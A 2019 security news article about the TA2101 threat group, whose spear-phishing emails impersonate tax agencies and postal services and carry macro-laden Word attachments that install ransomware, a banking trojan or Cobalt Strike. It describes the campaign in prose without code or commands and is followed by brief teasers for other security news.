Show vulnerabilities with patch / with exploit
15 November 2019

New group of hackers targets businesses with backdoor malware in financially-motivated attacks


New group of hackers targets businesses with backdoor malware in financially-motivated attacks

ProofPoint researchers uncovered a new phishing scheme that targets several businesses and organizations in Germany, Italy, and the United States in order to infect their networks with malware. The attacks are orchestrated by a relatively new hacking crew, tracked as TA2101, that appears to be interested in businesses, IT services, manufacturing, and healthcare industries.

The threat actor uses legitimate and licensed penetration testing tools and backdoor framework such as Cobalt Strike and Metasploit to perform the post-exploitation operation. The malware is delivered via spear-phishing emails purported to be from financial regulatory agencies.

Between October and November 2019, Proofpoint researchers observed several campaigns that used malicious email messages to infect organizations in Germany, Italy, and the United States with backdoor, banking Trojan, or ransomware malware. In all observed cases the attackers used malicious Word document attachments as an initial vector to compromise the device.

Once opened, the attachment executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs one of the malicious payloads (Maxe ransomware, IcedID trojan or Cobalt Strike backdoor) onto the victim’s system.

In addition to social engineering, the hackers are also using stolen branding and lookalike domains of European taxation agencies and other public-facing entities such as Internet service providers to make phishing emails look even more convincing. In the recent campaigns the phishing emails were observed to impersonate the following entities:

Bundeszentralamt fur Steuern, the German Federal Ministry of Finance,

Agenzia Delle Entrate, the Italian Revenue Agency,

1&1 Internet AG, a German internet service provider,

USPS, the United States Postal Service.

“The increasing sophistication of these lures mirrors improved social engineering and a focus on effectiveness over quantity appearing in many campaigns globally across the email threat landscape,” the researchers concluded.

The more detailed analysis, as well as Indicators of Compromise (IoCs) related to the recent campaigns, are available in ProofPoint blog post.

Back to the list

Latest Posts

New Mirai variant expands its arsenal with exploit for bug in Comtrend routers

New Mirai variant expands its arsenal with exploit for bug in Comtrend routers

The new Mirai variant is the first botnet version that incorporates the exploit for CVE-2020-10173.
14 July 2020
Personal information of over 142 million MGM hotel guests offered for sale on the dark web

Personal information of over 142 million MGM hotel guests offered for sale on the dark web

Over the weekend, an advertisement appeared on one of the dark web marketplaces offering for sale the details of 142,479,937 MGM hotel guests.
14 July 2020
RECON bug puts enterprise systems at risk of takeover

RECON bug puts enterprise systems at risk of takeover

The flaw allows a remote, unauthenticated attacker create a new SAP user with the highest privileges, and thus fully compromise vulnerable SAP installations.
14 July 2020